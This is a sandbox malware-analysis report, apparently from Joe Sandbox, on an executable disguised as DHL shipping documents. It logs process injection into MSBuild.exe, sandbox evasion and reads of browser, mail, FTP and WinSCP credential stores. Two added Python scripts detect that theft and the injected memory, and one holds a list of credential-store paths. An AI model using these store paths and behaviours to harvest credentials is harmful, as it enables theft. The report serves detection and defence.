Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: DHL Shipping Documents 0016229753_PDF.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: DHL Shipping Documents 0016229753_PDF.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: DHL Shipping Documents 0016229753_PDF.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: `.Pdb/> source: MSBuild.exe, 00000003.00000002.2591555257.0000000000F11000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\cashout\Desktop\Outputs\Meazod.pdb source: DHL Shipping Documents 0016229753_PDF.exe
Source: Binary string: `.Pdb/ source: MSBuild.exe, 00000003.00000002.2591555257.0000000000F11000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

Source: DHL Shipping Documents 0016229753_PDF.exe, Network.cs; .Net Code: GetComponentsUndirected System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Code function: 1_2_00007FF886E310FA pushad ; ret 1_2_00007FF886E31233
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Code function: 1_2_00007FF886E31210 pushad ; ret 1_2_00007FF886E31233
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Memory allocated: 1820000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Memory allocated: 1B280000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Memory allocated: 1350000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Memory allocated: 2CE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Memory allocated: 4CE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe TID: 2580; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C240000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWZ
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C240000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015AA000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW B$
Source: MSBuild.exe, 00000003.00000002.2594562989.0000000005FCA000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlleExt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43C000
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: CC2008
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe; Queries volume information: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.2592099804.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: DHL Shipping Documents 0016229753_PDF.exe PID: 5836, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: MSBuild.exe PID: 5764, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2592099804.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DHL Shipping Documents 0016229753_PDF.exe PID: 5836, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5764, type: MEMORYSTR
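The file and registry opens listed above are the credential stores the injected MSBuild.exe reads: the Chrome and Edge "Login Data" databases, the profiles.ini of Firefox and its Cyberfox and BlackHawk forks, Thunderbird's profiles.ini, FTP Navigator's site list, WinSCP's saved sessions, the MAPI profile hive and IncrediMail identities. A signed build tool has no reason to open any of them, and that mismatch between the reading process and the store's owner is the detection. The Python below is an added example, not part of the Joe Sandbox report or of Joe Sandbox: it runs the owner-mismatch check over constructed telemetry lines in a "timestamp|event|image|target" shape, where the MSBuild.exe lines reproduce the accesses the report lists. The mapping of each store to the image that legitimately reads it is an assumption to tune per environment.

```python
"""Flag credential-store access by a process that does not own the store.

Added example; it is not part of the Joe Sandbox report. The file and registry
paths are those the report shows MSBuild.exe opening. The telemetry lines are
constructed to resemble EDR file-open / registry-open events, and the mapping of
each store to the images that legitimately read it is an assumption to tune per
environment.
"""
from dataclasses import dataclass

# store label -> (lower-cased path fragments that must all occur in the target,
#                 image names that legitimately read that store; an assumption)
CREDENTIAL_STORES = {
    "Chrome saved logins": (("\\google\\chrome\\user data\\", "\\login data"), {"chrome.exe"}),
    "Edge saved logins": (("\\microsoft\\edge\\user data\\", "\\login data"), {"msedge.exe"}),
    "Firefox profiles": (("\\mozilla\\firefox\\profiles.ini",), {"firefox.exe"}),
    "Cyberfox profiles": (("\\8pecxstudios\\cyberfox\\profiles.ini",), {"cyberfox.exe"}),
    "BlackHawk profiles": (("\\netgate technologies\\blackhawk\\profiles.ini",), {"blackhawk.exe"}),
    "Thunderbird profiles": (("\\thunderbird\\profiles.ini",), {"thunderbird.exe"}),
    "FTP Navigator site list": (("\\ftp navigator\\ftplist.txt",), {"ftpnavigator.exe"}),
    "WinSCP sessions (registry)": (("\\martin prikryl\\winscp 2\\sessions",), {"winscp.exe"}),
    "MAPI profiles (registry)": (("\\windows messaging subsystem\\profiles",), {"outlook.exe"}),
    "IncrediMail identities (registry)": (("\\incredimail\\identities",), {"incredimail.exe"}),
}


@dataclass
class Access:
    timestamp: str
    process: str        # image file name, lower-cased
    store: str
    target: str
    legitimate: bool    # True when the reading image is an owner of the store


def classify(line):
    """Map one 'timestamp|event|image|target' record to an Access, or None when the
    target is not a known credential store."""
    timestamp, _event, image, target = line.split("|", 3)
    process = image.rsplit("\\", 1)[-1].lower()
    needle = target.lower()
    for store, (fragments, owners) in CREDENTIAL_STORES.items():
        if all(fragment in needle for fragment in fragments):
            return Access(timestamp, process, store, target, process in owners)
    return None


def detect(log_text, threshold=2):
    """Return ({process: [stores]}, hits): every non-owner process that opened at
    least `threshold` distinct credential stores, plus the individual hits."""
    hits = [a for a in map(classify, log_text.strip().splitlines())
            if a is not None and not a.legitimate]
    by_process = {}
    for hit in hits:
        by_process.setdefault(hit.process, set()).add(hit.store)
    flagged = {p: sorted(s) for p, s in by_process.items() if len(s) >= threshold}
    return flagged, hits


# Constructed telemetry; the MSBuild.exe lines mirror the accesses in the report.
SAMPLE_LOG = r"""
2024-08-02T13:03:11Z|FileOpen|C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
2024-08-02T13:03:11Z|FileOpen|C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
2024-08-02T13:03:12Z|FileOpen|C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
2024-08-02T13:03:12Z|RegOpen|C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
2024-08-02T13:03:13Z|FileOpen|C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|C:\Users\user\src\app\app.csproj
2024-08-02T13:03:14Z|FileOpen|C:\Program Files\Google\Chrome\Application\chrome.exe|C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
2024-08-02T13:03:15Z|FileOpen|C:\Program Files\Mozilla Firefox\firefox.exe|C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
2024-08-02T13:03:16Z|RegOpen|C:\Program Files (x86)\WinSCP\WinSCP.exe|HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
"""

if __name__ == "__main__":
    flagged, hits = detect(SAMPLE_LOG)
    for process, stores in flagged.items():
        print(f"{process}: opened {len(stores)} credential stores: {', '.join(stores)}")
```

The threshold matters: a single foreign read of profiles.ini is noisy (backup agents, migration tools), while one process touching a browser login database, a mail profile hive and an SFTP session store within seconds is the stealer pattern this report shows. The owners' own reads (chrome.exe on its Login Data, WinSCP.exe on its Sessions key) are dropped before counting.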

Remote Access Functionality

Source: Yara match, file source: dump.pcap (type: PCAP)
Source: Yara match, file source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack (type: UNPACKEDPE)
Source: Yara match, file source: 3.2.MSBuild.exe.400000.0.unpack (type: UNPACKEDPE)
Source: Yara match, file source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack (type: UNPACKEDPE)
Source: Yara match, file source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack (type: UNPACKEDPE)
Source: Yara match, file source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack (type: UNPACKEDPE)
Source: Yara match, file source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack (type: UNPACKEDPE)
Source: Yara match, file source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack (type: UNPACKEDPE)
Source: Yara match, file source: 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
Source: Yara match, file source: 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
Source: Yara match, file source: 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp (type: MEMORY)
Source: Yara match, file source: 00000003.00000002.2592099804.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
Source: Yara match, file source: 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY)
Source: Yara match, file source: Process Memory Space: DHL Shipping Documents 0016229753_PDF.exe PID: 5836 (type: MEMORYSTR)
Source: Yara match, file source: Process Memory Space: MSBuild.exe PID: 5764 (type: MEMORYSTR)
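The dump identifiers in these Yara-match lists carry the memory-region metadata a responder needs. An .unpack name such as 3.2.MSBuild.exe.400000.0.unpack reads as process index, dump number, image name, hexadecimal carve address and index. The payload PEs carved from the DHL sample (process 1) sit at unaligned addresses (0x32b7d70, 0x13323f68, 0x328f708, 0x3293538) inside regions whose .sdmp names show protection 0x04 and type 0x20000, i.e. a .NET payload held in ordinary heap memory; in MSBuild.exe (process 3) the PE is carved at 0x400000 and the matching region at 0x402000 shows protection 0x40 and type 0x20000, i.e. PAGE_EXECUTE_READWRITE memory that was allocated rather than mapped from an image, which is what the "injects a PE file into a foreign process" signature describes. The Python below is an added example, not part of the report or of Joe Sandbox: it parses those names and flags both patterns. Reading the fourth, fifth and seventh .sdmp fields as base address, Win32 page protection and Win32 region type is inferred from the values on this page and is an assumption; the remaining numeric fields are carried through uninterpreted.

```python
"""Parse Joe Sandbox .sdmp / .unpack identifiers and flag injected-code patterns.

Added example, not part of this report or of Joe Sandbox. Field interpretation is
inferred from the identifiers on this page and is an assumption: in a .sdmp name
the 4th field is the region base address, the 5th the Win32 page protection and
the 7th the Win32 region type; fields 3, 6 and 8 are kept but not interpreted.
"""
import re

# Win32 memory constants (winnt.h)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0xF0                      # any PAGE_EXECUTE* protection
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
PAGE_SIZE = 0x1000
DEFAULT_IMAGE_BASE_32 = 0x400000         # linker default for 32-bit executables

# Process indices as the report's own .unpack names give them.
PROCESS_INDEX = {1: "DHL Shipping Documents 0016229753_PDF.exe", 3: "MSBuild.exe"}

SDMP_RE = re.compile(
    r"^(?P<proc>\d{8})\.(?P<dump>\d{8})\.(?P<ident>\d+)\.(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\."
    r"(?P<f8>[0-9A-Fa-f]{8})\.sdmp$")
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<dump>\d+)\.(?P<image>.+?)\.(?P<base>[0-9a-f]+)\."
    r"(?P<idx>\d+)\.(?P<raw>raw\.)?unpack$")


def parse_sdmp(name):
    """Decode a memory-region dump name into process, base, protection and type."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name}")
    protect = int(m["protect"], 16)
    mtype = int(m["mtype"], 16)
    return {
        "process": int(m["proc"]), "dump": int(m["dump"]), "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),   # low byte: PAGE_GUARD etc. are modifiers
        "type": MEM_TYPE.get(mtype, hex(mtype)),
        "executable": bool(protect & EXECUTE_MASK),
        "private": mtype == 0x20000,
    }


def parse_unpack(name):
    """Decode an unpacked-PE name: process, dump, image, carve address, raw flag."""
    m = UNPACK_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .unpack name: {name}")
    return {"process": int(m["proc"]), "dump": int(m["dump"]), "image": m["image"],
            "base": int(m["base"], 16), "index": int(m["idx"]), "raw": m["raw"] is not None}


def triage(names):
    """Return (name, kind, note) for every artifact that matches an injection pattern."""
    findings = []
    for name in names:
        if name.endswith(".sdmp"):
            r = parse_sdmp(name)
            who = PROCESS_INDEX.get(r["process"], f"process {r['process']}")
            if r["executable"] and r["private"]:
                findings.append((name, "rwx-private",
                                 f"{who}: {r['protect']} {r['type']} region at {r['base']:#x}; "
                                 "executable memory allocated rather than mapped from an image"))
        elif name.endswith(".unpack"):
            r = parse_unpack(name)
            if r["base"] % PAGE_SIZE:
                findings.append((name, "unaligned-pe",
                                 f"{r['image']}: PE carved from {r['base']:#x}, not page-aligned, "
                                 "so it was held in a heap buffer rather than loaded as a module"))
            elif r["base"] == DEFAULT_IMAGE_BASE_32:
                findings.append((name, "image-base-pe",
                                 f"{r['image']}: PE carved from the default 32-bit image base "
                                 f"{r['base']:#x}; check whether that range is MEM_IMAGE (a loaded "
                                 "module) or MEM_PRIVATE (written there by another process)"))
    return findings


# Identifiers taken from the Yara-match lists of this report.
REPORT_ARTIFACTS = [
    "1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack",
    "3.2.MSBuild.exe.400000.0.unpack",
    "1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack",
    "1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack",
    "00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp",
    "00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp",
    "00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp",
    "00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for name, kind, note in triage(REPORT_ARTIFACTS):
        print(f"[{kind}] {note}")
```

Run against the report's own identifiers, the triage pairs the unpacked PE at 0x400000 in MSBuild.exe with the private RWX region at 0x402000 in the same process, while the DHL process only yields heap-held PEs in read-write memory: the dropper carries the AgentTesla payload as a managed byte array and the executable copy exists only inside the injected MSBuild.exe.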
MITRE ATT&CK matrix, one line per tactic. The figures in parentheses reproduce the digits displayed in the matrix cell (its signature-count badges); techniques without a figure are the matrix's unmarked template cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (121); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: DLL Side-Loading (1); Process Injection (311); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
